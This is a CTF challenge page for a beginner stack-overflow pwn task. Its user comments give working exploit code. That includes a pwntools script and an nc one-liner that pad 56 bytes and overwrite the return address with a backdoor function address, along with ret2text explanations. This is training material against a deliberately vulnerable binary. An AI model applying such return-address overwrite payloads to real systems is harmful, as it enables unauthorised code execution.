overflowPWN 未解决

分数: 20 金币: 4
题目作者: harry
一  血: blanc
一血奖励: 1金币
解  决: 2256
提  示:
描  述:
pwn2
其  他: 下载
评论
goby 1月前

payload = b'a'*(0x30+8)+p64(get_shell_addr)

回复 0

nirvana。 3月前

在虚拟机中下好文件后,用终端打开下载目录,用unzip file.zip解压文件,ls查看文件,发现解压得到文件名为pwn2,用file pwn2分析,接着用nano exp.py编写Python脚本,最后python3 exp.py执行,得到flag

回复 0

xtk 5月前

from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了

回复 0

modeng 7月前

这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502

回复 1

王安小子 7月前

python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok

回复 0

乌鸦乌鸦乌鸦乌鸦 11月前

为什么答案是56字节,我测出来是40字节

回复 0
scust 11月前

看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节

回复 1

weiyouzhunze 1年前

栈溢出漏洞利用

回复 0

afag 1年前

0x30+8填充

回复 0

17773146280 1年前

简单的ret2text题目,后门函数地址加上缓冲区长度就可以了

回复 0

YellowZy 1年前

应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充

回复 0

WriteUp

image
Leuslu

9 金币

评分(3)

解题动态

blll 攻破了该题 5小时前
7735608 攻破了该题 15小时前
juzijuzi 攻破了该题 16小时前
kris123 攻破了该题 20小时前
特工绍特 攻破了该题 1天前
qwe1534 攻破了该题 1天前
fany 攻破了该题 1天前
icyskin 攻破了该题 1天前
扭扭捏捏抱抱抱抱 攻破了该题 1天前
ndaygril 攻破了该题 2天前
sweetymousewh 攻破了该题 2天前
dwx386572657 攻破了该题 3天前
2234213956 攻破了该题 4天前
lve_yu 攻破了该题 5天前
wsl2517735297 攻破了该题 5天前
vv、lawd 攻破了该题 5天前
翔仔 攻破了该题 6天前
xiyun 攻破了该题 8天前
kai_le 攻破了该题 8天前
cc1 攻破了该题 8天前
问题反馈